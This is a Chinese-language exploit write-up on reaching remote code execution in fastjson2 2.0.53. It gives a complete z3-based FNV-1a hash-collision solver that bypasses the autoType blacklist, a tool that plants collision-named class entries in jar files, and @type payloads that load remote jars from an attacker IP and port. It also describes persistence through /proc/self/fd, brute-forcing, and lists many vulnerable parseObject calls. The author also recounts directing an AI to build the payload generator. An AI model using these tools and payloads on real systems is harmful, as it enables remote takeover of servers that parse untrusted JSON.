+ safe_str = collision_str.encode('utf-8', errors='backslashreplace').decode('utf-8')
+ print(f" 字符串: \"{safe_str}\"")
+ print()
+ print("─" * 64)
+ print(" 使用提示")
+ print("─" * 64)
+ print()
+ print(" 1. Java 中使用 (用 Unicode 转义):")
+ print(f' String s = "{"".join(f"\\u{c:04x}" for c in result)}";')
+ print(f" long hash = com.alibaba.fastjson2.util.Fnv.hashCode64(s);")
+ print()
+ print(" 2. 这个字符串的 FNV-1a hash 等于目标 hash")
+ print(" 3. 每个字符 > 255, 确保走 FNV-1a 分支 (非短字符串优化)")
+ print()
+ print("═" * 64)
+
+
+if __name__ == '__main__':
+ main()
+对应方程组:
+已知:
+ OFFSET = 0xcbf29ce484222325
+ PRIME = 0x100000001b3
+ target = -6293031534589903644
+
+方程(假设是 5 位数):
+ let h0 = OFFSET
+ let h1 = (h0 ^ c0) * PRIME
+ let h2 = (h1 ^ c1) * PRIME
+ let h3 = (h2 ^ c2) * PRIME
+ let h4 = (h3 ^ c3) * PRIME
+ let h5 = (h4 ^ c4) * PRIME
+ h5 == target
+解方程核心代码块:
+
最终对应 fastjson 场景解密 -6293031534589903644 效果:
+
通过解方程的形式成功达到 Hash 碰撞的效果, 那么在此基础之上我们只需要将我们在 fastjson 1.2.83 中的 payload 作为前缀即可. 以任意字符为前缀的话, 对于 fastjson 的计算来说仅仅是起点不同了:
+
因为它是依次按照^= & *=做位运算的, 丝毫不影响我们制作 payload, 定制 Python 脚本:
+#!/usr/bin/env python3
+"""
+FNV-1a 64 位哈希碰撞求解器 (z3) - 支持自定义前缀
+
+对标 fastjson2 2.0.53 Fnv.hashCode64 的实现:
+ - 长字符串 (>8 字符) 或含字符 >255: 走 FNV-1a
+ - FNV-1a: hash = (hash ^ ch) * prime
+ - offset = 0xcbf29ce484222325
+ - prime = 0x100000001b3
+
+★ 前缀支持 (--prefix):
+ 指定已知前缀字符串, 该前缀先参与 FNV-1a 计算, 改变起始 hash,
+ 然后再求解 N 个未知字符使最终 hash 等于目标.
+ 对应 Java 语义: Fnv.hashCode64(prefix + unknown) == targetHash
+
+用法:
+ python3 fnv_collision.py <目标hash> [字符数] [最小字符] [最大字符] [--prefix PREFIX]
+
+参数:
+ 目标hash : 十进制 (可负) 或 0x 开头的十六进制
+ 字符数 : 默认 5 (未知字符数, 不含 prefix)
+ 最小字符 : 默认 256 (确保 >255, 触发 FNV-1a)
+ 最大字符 : 默认 65535 (Java char 上限)
+ --prefix : 已知前缀字符串 (先参与 FNV-1a, 再求未知字符)
+
+示例:
+ python3 fnv_collision.py 0xd5ef36df67371111
+ python3 fnv_collision.py -6293031534589903644
+ python3 fnv_collision.py 0xd5ef36df67371111 5 256 65535 --prefix abc
+ python3 fnv_collision.py 0xd5ef36df67371111 3 --prefix 'java.lang.String'
+
+依赖:
+ pip3 install z3-solver
+"""
+import sys
+import argparse
+import time
+from z3 import *
+
+# FNV-1a 64 位常量
+OFFSET = 0xcbf29ce484222325
+PRIME = 0x100000001b3
+
+
+def parse_hash(s):
+ """解析 hash 参数: 支持十进制 (可负) 和十六进制 (0x开头)"""
+ s = s.strip()
+ if s.lower().startswith('0x'):
+ v = int(s, 16)
+ # 转成有符号 long (Java long 是有符号 64 位)
+ if v >= 2**63:
+ v -= 2**64
+ return v
+ return int(s)
+
+
+def to_unsigned(v):
+ """有符号 long -> 无符号"""
+ return v & 0xFFFFFFFFFFFFFFFF
+
+
+def to_java_chars(s):
+ """
+ 将 Python 字符串转成 Java char (UTF-16 code unit) 序列.
+
+ Java 的 String.charAt(i) 返回 16 位 char, FNV-1a 实际是对
+ UTF-16 code unit 迭代, 不是对 Unicode codepoint 迭代.
+ - BMP 字符 (0x0000-0xFFFF): code unit == codepoint, 两者等价
+ - 非 BMP 字符 (如 emoji 0x1F600): Java 迭代代理对 [0xD83D, 0xDE00],
+ Python 的 ord() 返回整个 codepoint. 本函数确保与 Java 行为一致.
+ """
+ b = s.encode('utf-16-be')
+ return [int.from_bytes(b[i:i+2], 'big') for i in range(0, len(b), 2)]
+
+
+def fnv1a_hash(s):
+ """计算 FNV-1a hash (跟 fastjson2 2.0.53 长字符串分支一致)"""
+ h = OFFSET
+ for ch in to_java_chars(s):
+ h ^= ch
+ h = (h * PRIME) & 0xFFFFFFFFFFFFFFFF
+ return h
+
+
+def fnv1a_prefix_state(prefix):
+ """
+ 计算 prefix 参与 FNV-1a 后的起始 hash 状态.
+
+ 返回 (h_start, prefix_chars, prefix_has_high_char):
+ h_start : prefix 跑完 FNV-1a 后的 hash (作为未知字符的起点)
+ prefix_chars : prefix 的 Java char 序列
+ prefix_has_high_char : prefix 是否含 >255 的 char (影响 FNV-1a 触发判断)
+ """
+ chars = to_java_chars(prefix)
+ h = OFFSET
+ for ch in chars:
+ h ^= ch
+ h = (h * PRIME) & 0xFFFFFFFFFFFFFFFF
+ has_high = any(ch > 255 for ch in chars)
+ return h, chars, has_high
+
+
+def solve(target_hash, num_chars=5, min_char=256, max_char=65535, prefix=''):
+ """
+ 用 z3 求 N 字符碰撞 (支持已知前缀)
+
+ target_hash: 目标 hash (有符号 long)
+ num_chars: 未知字符数 (不含 prefix)
+ min_char: 字符最小值 (256 确保触发 FNV-1a)
+ max_char: 字符最大值 (65535 = Java char 上限)
+ prefix: 已知前缀字符串, 先参与 FNV-1a 计算, 改变起始 hash
+
+ 求解等式: FNV1a_continue(FNV1a(prefix), unknown_chars) == target_hash
+ """
+ target_unsigned = to_unsigned(target_hash)
+
+ # ★ 关键: 先把 prefix 跑一遍 FNV-1a, 得到起始 hash
+ # prefix 是已知常量, 这一步用纯 Python 算出具体数值, 不需要 z3 变量
+ h_start, prefix_chars, prefix_has_high = fnv1a_prefix_state(prefix)
+
+ # 创建 num_chars 个 64 位 BitVec 变量 (只对未知字符建变量)
+ c = [BitVec(f'c{i}', 64) for i in range(num_chars)]
+
+ # FNV-1a 计算 (从 prefix 处理后的 h_start 继续)
+ h = BitVecVal(h_start, 64)
+ for i in range(num_chars):
+ h = (h ^ c[i]) * BitVecVal(PRIME, 64)
+
+ # 求解器
+ s = Solver()
+ s.add(h == BitVecVal(target_unsigned, 64))
+
+ # 字符范围约束
+ for i in range(num_chars):
+ s.add(c[i] >= min_char)
+ s.add(c[i] <= max_char)
+ # ★ 排除 UTF-16 代理对范围 (0xD800-0xDFFF)
+ # 这些码点专用于 UTF-16 编码,不能作为独立字符
+ # Python chr() 能产生但 print 时 UTF-8 不允许
+ s.add(Or(c[i] < 0xD800, c[i] > 0xDFFF))
+
+ # FNV-1a 触发条件检查 (考虑 prefix)
+ # fastjson2: 字符串长度 > 8 或任一 char > 255 -> 走 FNV-1a
+ prefix_java_len = len(prefix_chars)
+ total_len = prefix_java_len + num_chars
+
+ # 只有当总长度 <=8 且 prefix 没有高字符 且 字符范围含 <=255 时,
+ # 才需要强制至少一个未知字符 >255 (确保走 FNV-1a 而非短字符串优化)
+ if min_char <= 255 and total_len <= 8 and not prefix_has_high:
+ s.add(Or([c[i] > 255 for i in range(num_chars)]))
+
+ # 求解
+ result = s.check()
+ if result == sat:
+ m = s.model()
+ return [m[c[i]].as_long() for i in range(num_chars)]
+ return None
+
+
+def main():
+ parser = argparse.ArgumentParser(
+ description='FNV-1a 64 位哈希碰撞求解器 (z3) - 支持自定义前缀',
+ formatter_class=argparse.RawDescriptionHelpFormatter,
+ )
+ parser.add_argument('target_hash', type=str,
+ help='目标 hash (十进制可负 / 0x十六进制)')
+ parser.add_argument('num_chars', type=int, nargs='?', default=5,
+ help='未知字符数 (默认 5, 不含 prefix)')
+ parser.add_argument('min_char', type=int, nargs='?', default=256,
+ help='字符最小值 (默认 256)')
+ parser.add_argument('max_char', type=int, nargs='?', default=65535,
+ help='字符最大值 (默认 65535)')
+ parser.add_argument('--prefix', type=str, default='',
+ help='已知前缀字符串, 先参与 FNV-1a 再求解未知字符')
+ args = parser.parse_args()
+
+ target_hash = parse_hash(args.target_hash)
+ num_chars = args.num_chars
+ min_char = args.min_char
+ max_char = args.max_char
+ prefix = args.prefix
+
+ # 预计算 prefix 状态 (用于显示)
+ h_start, prefix_chars, prefix_has_high = fnv1a_prefix_state(prefix)
+ prefix_java_len = len(prefix_chars)
+ total_len = prefix_java_len + num_chars
+
+ print("═" * 64)
+ print(" FNV-1a 64 位哈希碰撞求解器 (z3)")
+ print("═" * 64)
+ print()
+ print(f" 目标 hash (有符号): {target_hash}")
+ print(f" 目标 hash (无符号): {to_unsigned(target_hash)}")
+ print(f" 目标 hash (十六进制): 0x{to_unsigned(target_hash):016x}")
+ print()
+ print(f" 未知字符数: {num_chars}")
+ print(f" 字符范围: [{min_char}, {max_char}]")
+ if prefix:
+ prefix_display = prefix.encode('utf-8', errors='backslashreplace').decode('utf-8')
+ print(f" 已知前缀: \"{prefix_display}\"")
+ print(f" 前缀长度: {prefix_java_len} Java char(s)")
+ print(f" 前缀含 >255 字符: {'是' if prefix_has_high else '否'}")
+ print(f" 前缀处理后起始 hash: 0x{h_start:016x}")
+ print(f" (原始 OFFSET: 0x{OFFSET:016x})")
+ print(f" 总字符串长度: {total_len} Java char(s)")
+ if min_char <= 255 and total_len <= 8 and not prefix_has_high:
+ print(f" ⚠ 总长度 <=8 且范围含 <=255, 会强制至少一个未知字符 >255 (走 FNV-1a)")
+ print()
+
+ # 求解
+ print(" 求解中...")
+ start = time.time()
+ result = solve(target_hash, num_chars, min_char, max_char, prefix)
+ elapsed = time.time() - start
+
+ if result is None:
+ print(f" ✗ 未找到解 (unsat), 耗时 {elapsed:.2f}s")
+ print()
+ print(" 可能原因:")
+ print(" 1. 输入空间太小 (字符数 × 位宽 < 64)")
+ print(" 2. z3 求解超时 (尝试减少字符数)")
+ print(" 3. 真的无解 (极少见)")
+ return
+
+ print(f" ✓ 找到解! 耗时 {elapsed:.2f}s")
+ print()
+
+ # 构造碰撞字符串 (只有未知部分)
+ collision_str = ''.join(chr(c) for c in result)
+ # 完整字符串 = prefix + 未知部分
+ full_str = prefix + collision_str
+
+ # 验证: 完整字符串的 FNV-1a hash 应该等于目标
+ actual_hash = fnv1a_hash(full_str)
+
+ print("─" * 64)
+ print(" 碰撞结果")
+ print("─" * 64)
+ print()
+ print(f" 原始目标 hash: 0x{to_unsigned(target_hash):016x}")
+ print(f" 完整字符串 hash: 0x{to_unsigned(actual_hash):016x}")
+ print(f" 匹配: {'✓' if to_unsigned(actual_hash) == to_unsigned(target_hash) else '✗'}")
+ print()
+ if prefix:
+ prefix_display = prefix.encode('utf-8', errors='backslashreplace').decode('utf-8')
+ print(f" 已知前缀: \"{prefix_display}\"")
+ print(f" 未知部分 Code Points: {result}")
+ print(f" 未知部分 十六进制: [{', '.join(f'0x{c:04x}' for c in result)}]")
+ print(f" 未知部分 Unicode 转义: {''.join(f'\\u{c:04x}' for c in result)}")
+ safe_str = collision_str.encode('utf-8', errors='backslashreplace').decode('utf-8')
+ print(f" 未知部分字符串: \"{safe_str}\"")
+ print()
+ print("─" * 64)
+ print(" 使用提示")
+ print("─" * 64)
+ print()
+ # Java 形式: prefix 用 Unicode 转义 + 未知部分用 Unicode 转义
+ prefix_unicode = ''.join(f'\\u{ch:04x}' for ch in prefix_chars)
+ unknown_unicode = ''.join(f'\\u{c:04x}' for c in result)
+ if prefix:
+ print(" 1. Java 中使用 (prefix + 未知部分, 全 Unicode 转义):")
+ print(f' String s = "{prefix_unicode}{unknown_unicode}";')
+ print()
+ prefix_display = prefix.encode('utf-8', errors='backslashreplace').decode('utf-8')
+ print(" 2. 或者 prefix 用字面量, 未知部分用 Unicode 转义:")
+ print(f' String s = "{prefix_display}" + "{unknown_unicode}";')
+ else:
+ print(" 1. Java 中使用 (用 Unicode 转义):")
+ print(f' String s = "{unknown_unicode}";')
+ print()
+ print(f" long hash = com.alibaba.fastjson2.util.Fnv.hashCode64(s);")
+ print()
+ print(" 3. 这个字符串的 FNV-1a hash 等于目标 hash")
+ if min_char > 255:
+ print(" 4. 每个未知字符 > 255, 确保走 FNV-1a 分支 (非短字符串优化)")
+ print()
+ print("═" * 64)
+
+
+if __name__ == '__main__':
+ main()
+生成远程加载的 payload:
+heihu577 @ ~/Desktop ❯ python fnv_collision.py --prefix "jar:http:..2887610369.2333.Hello\!.Hello" -6293031534589903644
+════════════════════════════════════════════════════════════════
+ FNV-1a 64 位哈希碰撞求解器 (z3)
+════════════════════════════════════════════════════════════════
+
+ 目标 hash (有符号): -6293031534589903644
+ 目标 hash (无符号): 12153712539119647972
+ 目标 hash (十六进制): 0xa8aaa929446ffce4
+
+ 未知字符数: 5
+ 字符范围: [256, 65535]
+ 已知前缀: "jar:http:..2887610369.2333.Hello!.Hello"
+ 前缀长度: 39 Java char(s)
+ 前缀含 >255 字符: 否
+ 前缀处理后起始 hash: 0x3acee6a3e7fcfdce
+ (原始 OFFSET: 0xcbf29ce484222325)
+ 总字符串长度: 44 Java char(s)
+
+ 求解中...
+ ✓ 找到解! 耗时 0.19s
+
+────────────────────────────────────────────────────────────────
+ 碰撞结果
+────────────────────────────────────────────────────────────────
+
+ 原始目标 hash: 0xa8aaa929446ffce4
+ 完整字符串 hash: 0xa8aaa929446ffce4
+ 匹配: ✓
+
+ 已知前缀: "jar:http:..2887610369.2333.Hello!.Hello"
+ 未知部分 Code Points: [16676, 4874, 30874, 19441, 64757]
+ 未知部分 十六进制: [0x4124, 0x130a, 0x789a, 0x4bf1, 0xfcf5]
+ 未知部分 Unicode 转义: \u4124\u130a\u789a\u4bf1\ufcf5
+ 未知部分字符串: "䄤ጊ碚䯱ﳵ"
+
+────────────────────────────────────────────────────────────────
+ 使用提示
+────────────────────────────────────────────────────────────────
+
+ 1. Java 中使用 (prefix + 未知部分, 全 Unicode 转义):
+ String s = "\u006a\u0061\u0072\u003a\u0068\u0074\u0074\u0070\u003a\u002e\u002e\u0032\u0038\u0038\u0037\u0036\u0031\u0030\u0033\u0036\u0039\u002e\u0032\u0033\u0033\u0033\u002e\u0048\u0065\u006c\u006c\u006f\u0021\u002e\u0048\u0065\u006c\u006c\u006f\u4124\u130a\u789a\u4bf1\ufcf5";
+
+ 2. 或者 prefix 用字面量, 未知部分用 Unicode 转义:
+ String s = "jar:http:..2887610369.2333.Hello!.Hello" + "\u4124\u130a\u789a\u4bf1\ufcf5";
+
+ long hash = com.alibaba.fastjson2.util.Fnv.hashCode64(s);
+
+ 3. 这个字符串的 FNV-1a hash 等于目标 hash
+ 4. 每个未知字符 > 255, 确保走 FNV-1a 分支 (非短字符串优化)
+
+════════════════════════════════════════════════════════════════
+该 payload 能成功走向 loadClass 逻辑:
+String jsonWithType = "{\"@type\":\"jar:http:..2887610369.2333.Hello!.Hello\\u4124\\u130a\\u789a\\u4bf1\\ufcf5\",\"name\":\"alice\",\"age\":25,\"email\":\"alice@lab.local\"}";
+// 不指定目标类,解析成 JSONObject
+Object obj = JSON.parseObject(jsonWithType, Object.class);
+System.out.println(obj);
+最终结果:
+
在 SpringBoot 中依旧能发送请求, 准备一个 SpringBoot 案例, 准备一个JSON.parseObject(可控,Object.class)可控端点即可.
+另外 Payload 使用 fastjson 1.2.83 的原有 payload 例如:
+jar:http:..2887610369:2333.Hello!.Hello
+原封不动的将其丢到 fnv 计算器中:
+
生成结果为:
+jar:http:..2887610369:2333.Hello!.Hello\ue94c\uc17c\uf770\ua803\uc0d3
+若想要在目标中驻留该 jar 包, 以维持后续的 fd 利用, 则需要 jar 包中已包含Hello\ue94c\uc17c\uf770\ua803\uc0d3.class这个文件, 但该文件由于文件名称为 Unicode 编码, 使用编程的场景更加方便, 编写新 python 脚本配合 fnv 脚本使用:
+#!/usr/bin/env python3
+"""
+JAR/ZIP 碰撞条目复制工具 - 配合 fnv_collision.py 使用
+
+功能:
+ 将 JAR 中已有的 class 文件复制一份, 在文件名末尾 (扩展名前) 插入
+ fnv_collision.py 求出的 unicode 字符, 形成新的 JAR 条目.
+
+ 这样 JNDI jar: URL 加载时, fastjson 校验的类名 FNV hash 命中碰撞值,
+ 实际加载的却是新条目 (内容与原 class 一致).
+
+用法:
+ python3 jar_collision_copy.py <JAR文件> <原class文件名> <unicode转义串>
+
+参数:
+ JAR文件 : 要修改的 JAR/ZIP 文件路径
+ 原 class 文件名 : JAR 中已存在的 class 条目名 (如 Hello.class)
+ unicode 转义串 : \\uXXXX 格式字符串 (来自 fnv_collision.py 输出)
+ ★ 请用单引号包裹, 避免 shell 解释 \\u
+
+示例:
+ python3 jar_collision_copy.py ./Hello Hello.class '\\ue94c\\uc17c\\uf770\\ua803\\uc0d3'
+
+ # 也可以直接传已解码的 unicode 字符 (双引号在 zsh 下会解码 \\u)
+ python3 jar_collision_copy.py ./Hello Hello.class "셼ꠃ샓"
+
+工作流程:
+ 1. 读取 JAR, 找到原 class 条目, 缓存其内容
+ 2. 解析 unicode 转义串 (\\uXXXX -> 实际字符)
+ 3. 构造新条目名: <原文件名去扩展名> + <解码字符> + <扩展名>
+ 例: Hello.class + \\ue94c... -> Hello\\ue94c... uc17c... .class
+ 4. 创建临时 JAR, 复制所有原条目 + 追加新条目
+ 5. 用临时 JAR 替换原 JAR
+ 6. 验证新条目存在且内容与原条目一致
+"""
+import sys
+import re
+import os
+import shutil
+import zipfile
+import tempfile
+
+
+def decode_unicode_escapes(s):
+ """
+ 将 \\uXXXX 格式的字符串解码为实际 unicode 字符.
+ 支持混合字面字符和转义序列: "Hello\\u4e16\\u754c" -> "Hello世界"
+ 若传入的已是实际字符 (无 \\u 转义), 原样返回.
+ """
+ pattern = re.compile(r'\\u([0-9a-fA-F]{4})')
+ return pattern.sub(lambda m: chr(int(m.group(1), 16)), s)
+
+
+def split_extension(name):
+ """
+ 分离条目名的主体和扩展名.
+ Hello.class -> ('Hello', '.class')
+ com/foo/Bar.class -> ('com/foo/Bar', '.class')
+ Hello -> ('Hello', '')
+ """
+ idx = name.rfind('.')
+ # 排除路径中的点 (如 com.foo/Bar 中的第一个点)
+ # 只认最后一个点, 且该点后面不是路径分隔符
+ if idx > 0 and '/' not in name[idx:]:
+ return name[:idx], name[idx:]
+ return name, ''
+
+
+def main():
+ if len(sys.argv) != 4:
+ print(__doc__)
+ sys.exit(1)
+
+ jar_path = sys.argv[1]
+ original_class = sys.argv[2]
+ unicode_str = sys.argv[3]
+
+ # 解码 unicode 转义
+ decoded = decode_unicode_escapes(unicode_str)
+
+ # 分离原 class 文件名和扩展名
+ base_name, ext = split_extension(original_class)
+
+ # 构造新条目名: base_name + decoded + ext
+ new_entry_name = base_name + decoded + ext
+
+ print("═" * 64)
+ print(" JAR 碰撞条目复制工具")
+ print("═" * 64)
+ print()
+ print(f" JAR 文件: {jar_path}")
+ print(f" 原 class 条目: {original_class}")
+ print(f" Unicode 输入: {unicode_str}")
+ print(f" 解码后字符: {repr(decoded)}")
+ print(f" 解码后 Unicode: {''.join(chr(c) for c in [ord(c) for c in decoded])!r}")
+ decoded_unicode_repr = ''.join('\\u{:04x}'.format(ord(c)) for c in decoded)
+ print(f" 解码后转义形式: {decoded_unicode_repr}")
+ print()
+ print(f" 新条目名: {repr(new_entry_name)}")
+ new_unicode_repr = ''.join('\\u{:04x}'.format(ord(c)) for c in new_entry_name)
+ print(f" 新条目 Unicode: {new_unicode_repr}")
+ print()
+
+ # 检查 JAR 文件
+ if not os.path.exists(jar_path):
+ print(f" ✗ JAR 文件不存在: {jar_path}")
+ sys.exit(1)
+
+ # 读取原 class 内容并检查
+ try:
+ with zipfile.ZipFile(jar_path, 'r') as zf:
+ names = zf.namelist()
+ if original_class not in names:
+ print(f" ✗ 原 class 条目 [{original_class}] 不在 JAR 中")
+ print()
+ print(" JAR 当前条目列表:")
+ for n in names:
+ display = n.encode('utf-8', errors='backslashreplace').decode('utf-8')
+ print(f" {display}")
+ sys.exit(1)
+ original_data = zf.read(original_class)
+ existing_new = new_entry_name in names
+ except zipfile.BadZipFile:
+ print(f" ✗ 不是有效的 ZIP/JAR 文件: {jar_path}")
+ sys.exit(1)
+
+ print(f" ✓ 找到原条目 [{original_class}], 大小 {len(original_data)} 字节")
+ if existing_new:
+ print(f" ⚠ 新条目已存在, 将覆盖")
+
+ # 创建临时文件, 复制所有条目 + 添加新条目
+ fd, tmp_path = tempfile.mkstemp(suffix='.jar')
+ os.close(fd)
+
+ try:
+ print()
+ print(" 写入新 JAR...")
+ with zipfile.ZipFile(jar_path, 'r') as src:
+ with zipfile.ZipFile(tmp_path, 'w', zipfile.ZIP_DEFLATED) as dst:
+ # 复制所有原条目 (跳过与新条目同名的, 稍后统一写)
+ for item in src.infolist():
+ if item.filename == new_entry_name:
+ continue
+ # 用 ZipInfo 保留原条目的压缩方式/时间戳等元信息
+ dst.writestr(item, src.read(item.filename))
+ # 追加新条目 (内容复制自原 class)
+ dst.writestr(new_entry_name, original_data)
+
+ # 用临时文件替换原 JAR
+ shutil.move(tmp_path, jar_path)
+ print(f" ✓ 已添加新条目")
+
+ except Exception as e:
+ if os.path.exists(tmp_path):
+ os.unlink(tmp_path)
+ print(f" ✗ 操作失败: {e}")
+ sys.exit(1)
+
+ # 验证结果
+ print()
+ print("─" * 64)
+ print(" 验证结果")
+ print("─" * 64)
+ print()
+ with zipfile.ZipFile(jar_path, 'r') as zf:
+ names = zf.namelist()
+ print(f" JAR 条目列表 ({len(names)} 项):")
+ for n in names:
+ display = n.encode('utf-8', errors='backslashreplace').decode('utf-8')
+ unicode_repr = ''.join('\\u{:04x}'.format(ord(c)) for c in n)
+ marker = ' ★ 新增' if n == new_entry_name else ''
+ print(f" {display}{marker}")
+ if n == new_entry_name:
+ print(f" unicode: {unicode_repr}")
+ data = zf.read(n)
+ if data == original_data:
+ print(f" 内容校验: ✓ 与原条目一致 ({len(data)} 字节)")
+ else:
+ print(f" 内容校验: ✗ 与原条目不一致!")
+ print(f" 原条目: {len(original_data)} 字节, 新条目: {len(data)} 字节")
+
+ print()
+ print("═" * 64)
+
+
+if __name__ == '__main__':
+ main()
+最终结果:
+
当前仅是驻留到受害机 /proc/{pid}/fd 中案例, 先使用 0kb 的文件做测试:
+
最终驻留成功.
+刚才的脚本仅仅是将jar 中的 class 文件名称符合传递的@type中的资源值, 若想要满足 RCE 还需要该 class 文件的内容(字节码)的类名同样带有 Unicode 编码. 此时对 AI 对我原 fastjson 1.2.83 的脚本进行说明了:
+我这里有一个项目:/Users/heihu577/Desktop/fastjson2/tools/fastjson-1.2.83-rce-jar-generator-1.0.1/GenJarBatch.java,你可以 阅读一波 README.md 文件之后,再看一波该 java 源码,现在我给你定义新的需求。新增:fnv_add_unicode_file 功能,对 cmd 或
+ defineClass 生成的 jar 文件进行分析。1: 分析出来 cmd 或 defineClass 生成的 jar 包,通过查看包名的形式能够定位到 fd0.Exception(假设生成的 class 文件是该结构,如果存在多个目录中存在 class 文件就依次进行如下操作),那么你可以通过 ASM 类库或者其他手段分析包名以及类名的结构来拼接为之前案例中的: python fnv_collision.py --prefix
+ "jar:http:..2887610369:2333.Hello\!.Hello" -6293031534589903644 中的 --prefix 部分(可能是 jar:file:.proc.self.fd.数字!. fd 数字.Exception)这种结构。2. 根据枚举出来的 包名类名结构,通过 python fnv_collision.py --prefix "jar:http:..2887610369:2333.Hello\!.Hello" -6293031534589903644 该脚本的逻辑来进行计算(是根据逻辑,但你需要写出对应
+ java 模块的功能来使得与该 python 的结果一致才行),得到其后缀需要增加的 Unicode 码部分。3. 你已经知道了要增加什么 Unicode 编码之后,你需要将 Hello 类中的字节码中的类名部分进行修改(可以使用 asm 实现),修改为 “Hello+Unicode 值”,并且将该 class 文件加入到 jar 包中(文件名同样符合类名规律)。整个过程全部使用 java 语言,禁止 java 中嵌套 python。
+坐等很长时间后, 又优化了一些细节:
+最后生成的 jar 包中,不是含有 class 文件吗,然后会输出:“jar:file:.proc.self.fd.256!.fd256.Exception醍눲䕹ᄬ憬”,我现在想让你把每次处理完毕的结果保存到"result.txt" 中。并且内容是:jar:file:.proc.self.fd.<NUM>!.fd<NUM>.Exception<Unicode 编码>,因为 fd 目录可能太多,然后你需要换行分割。
+用于爆破时使用. 但外部 http 需要远程下载 jar 到 /proc/self/fd 中, 继续给 AI 思路:
+现在对原有的 cmd/defineClass 做一个变更,就是写入 jar 文件中的 1.class 文件,为命令行中指明的 host 和 port 名称,或者整个命令行也可以。
+这是因为自己原编写的 fastjson 1.2.83 payload 的命令行参数存在攻击者 IP 和 PORT, 需要符合后续包名.
+让你做这一步,实际上是为了让你在 fnv_add_unicode_file 功能中增加两个需求:1. 解析 1.class 文件内容中的 ip 和 port 部分,组合为:jar:http:..<IP的10进制>:<IP的端口号>.<命令行中指明的文件名>!.1 2. 对组合结果进行 z3-fnv算法解方程,最后要拼接出:jar:http:..<IP的10进制>:<IP的端口号>.<命令行中指明的文件名>!.1<Unicode编码> 3. 拼接完成之后,在最终处理的 jar 包内增加这样一个真实文件,最最最后需要告诉用户首先使用该 payload 进行远程服务器下载。
+最终实现效果, 先是工具提示远程拉取:
+
随后是工具生成的 result.txt 进行爆破:
+
另外这里调教 AI 使用了 java 的 z3 实现解方程的效果.
+先是用工具生成 jar, 生成完毕之后进行转换为 FastJson2 版本, 等待 Hash 碰撞完整 jar:
+
最终结果:
+
参考: https://mp.weixin.qq.com/s/1niSP0dXlYql7euC5tMwPw 师傅的两个姿势, 除了 JSON.parseObject 以外仍然可以通过:
+JSON.parseObject(可控,List.class)
+JSON.parseObject(可控,Set.class)
+JSON.parse(可控)
+进行 RCE, 简单跟一下:
+String jsonWithType = "{\"@type\":\"jar:http:..2887610369.2333.Hello!.Hello\\u4124\\u130a\\u789a\\u4bf1\\ufcf5\",\"name\":\"alice\",\"age\":25,\"email\":\"alice@lab.local\"}";
+// 不指定目标类,解析成 JSONObject
+Object obj = JSON.parseObject(jsonWithType, List.class);
+System.out.println(obj);
+
以及:
+String jsonWithType = "{\"@type\":\"jar:http:..2887610369.2333.Hello!.Hello\\u4124\\u130a\\u789a\\u4bf1\\ufcf5\",\"name\":\"alice\",\"age\":25,\"email\":\"alice@lab.local\"}";
+// 不指定目标类,解析成 JSONObject
+Object obj = JSON.parseObject(jsonWithType, Set.class);
+
以及:
+String jsonWithType = "[{\"@type\":\"jar:http:..2887610369.2333.Hello!.Hello\\u4124\\u130a\\u789a\\u4bf1\\ufcf5\",\"name\":\"alice\",\"age\":25,\"email\":\"alice@lab.local\"}]";
+// 不指定目标类,解析成 JSONObject
+Object obj = JSON.parse(jsonWithType);
+System.out.println(obj);
+
相对于 JSON.parse 来说, 多了一步选择器的操作:
+
往上找一下看还有哪些语法能够调用该方法的 readObject, 查找了一番有如下类:
+JSON.parseObject(jsonWithType, Collection.class);
+JSON.parseObject(jsonWithType, ArrayList.class);
+JSON.parseObject(jsonWithType, HashSet.class);
+JSON.parseObject(jsonWithType, Comparable.class);
+JSON.parseObject(jsonWithType, Serializable.class);
+JSON.parseObject(jsonWithType, Cloneable.class);
+JSON.parseObject(jsonWithType, Closeable.class);
+JSON.parseObject(jsonWithType, Object[].class);
+规律参考:
+| 子类 | +类型 | +
|---|---|
| List 系 | +Iterable, Collection, List, AbstractCollection, AbstractList, ArrayList, Stack | +
| Queue/Deque 系 | +Queue, Deque, AbstractSequentialList, LinkedList, ConcurrentLinkedDeque, ConcurrentLinkedQueue, CopyOnWriteArrayList | +
| Set 系 | +Set, AbstractSet, EnumSet, NavigableSet, SortedSet, ConcurrentSkipListSet, LinkedHashSet, HashSet, TreeSet | +
可能还有更多 parseObject 手法可打.
+